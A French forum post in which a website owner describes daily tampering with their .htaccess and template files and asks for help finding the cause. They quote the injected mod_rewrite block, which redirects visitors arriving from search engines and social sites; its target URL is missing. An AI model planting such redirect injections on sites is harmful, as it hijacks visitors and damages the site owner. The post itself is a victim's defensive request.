Bonjour,
Je suis victime chaque jour d'une "attaque" qui a pour effet de rendre inaccessible mon site.
Quand j'accède aux fichiers via FTP, je vois que mon fichier .htaccess est modifié chaque jour par l'ajout de slignes suivantes
Les fichiers index.php des templates du site sont modifiés aussi.
J'arrive à rendre à nouveau le site accessible normalement en effaçant les fchiers modifiés et en remettant l'original à partir d'une sauvegarde que j'avais faite.
Une suggestion pour protection et pour la source du problème ?? Un module certainement mais lequel ?? Ou existe t'i un moyen de verrouiller le fichier .htaccess quelle que soit la source de la fuite, en attendant de la trouver...
Je suis victime chaque jour d'une "attaque" qui a pour effet de rendre inaccessible mon site.
Quand j'accède aux fichiers via FTP, je vois que mon fichier .htaccess est modifié chaque jour par l'ajout de slignes suivantes
Code:
#5d30bb# <IfModule mod_rewrite.c> RewriteEngine On RewriteCond %{HTTP_REFERER} ^.*(abacho|abizdirectory|about|acoon|alexana|allesklar|allpages|allthesites|alltheuk|alltheweb|altavista|america|amfibi|aol|apollo7|aport|arcor|ask|atsearch|baidu|bellnet|bestireland|bhanvad|bing|bluewin|botw|brainysearch|bricabrac|browseireland|chapu|claymont|click4choice|clickey|clickz|clush|confex|cyber-content|daffodil|devaro|dmoz|dogpile|ebay|ehow|eniro|entireweb|euroseek|exalead|excite|express|facebook|fastbot|filesearch|findelio|findhow|finditireland|findloo|findwhat|finnalle|finnfirma|fireball|flemiro|flickr|freenet|friendsreunited|galaxy|gasta|gigablast|gimpsy|globalsearchdirectory|goo|google|goto|gulesider|hispavista|hotbot|hotfrog|icq|iesearch|ilse|infoseek|ireland-information|ixquick|jaan|jayde|jobrapido|kataweb|keyweb|kingdomseek|klammeraffe|km|kobala|kompass|kpnvandaag|kvasir|libero|limier|linkedin|live|liveinternet|lookle|lycos|mail|mamma|metabot|metacrawler|metaeureka|mojeek|msn|myspace|netscape|netzindex|nigma|nlsearch|nol9|oekoportal|openstat|orange|passagen|pocketflier|qp|qq|rambler|rtl|savio|schnellsuche|search|search-belgium|searchers|searchspot|sfr|sharelook|simplyhired|slider|sol|splut|spray|startpagina|startsiden|sucharchiv|suchbiene|suchbot|suchknecht|suchmaschine|suchnase|sympatico|telfort|telia|teoma|terra|the-arena|thisisouryear|thunderstone|tiscali|t-online|topseven|twitter|ukkey|uwe|verygoodsearch|vkontakte|voila|walhello|wanadoo|web|webalta|web-archiv|webcrawler|websuche|westaustraliaonline|wikipedia|wisenut|witch|wolong|ya|yahoo|yandex|yell|yippy|youtube|zoneru)\.(.*) RewriteRule ^(.*)$[R=301,L] </IfModule> #/5d30bb#
J'arrive à rendre à nouveau le site accessible normalement en effaçant les fchiers modifiés et en remettant l'original à partir d'une sauvegarde que j'avais faite.
Une suggestion pour protection et pour la source du problème ?? Un module certainement mais lequel ?? Ou existe t'i un moyen de verrouiller le fichier .htaccess quelle que soit la source de la fuite, en attendant de la trouver...
Commentaire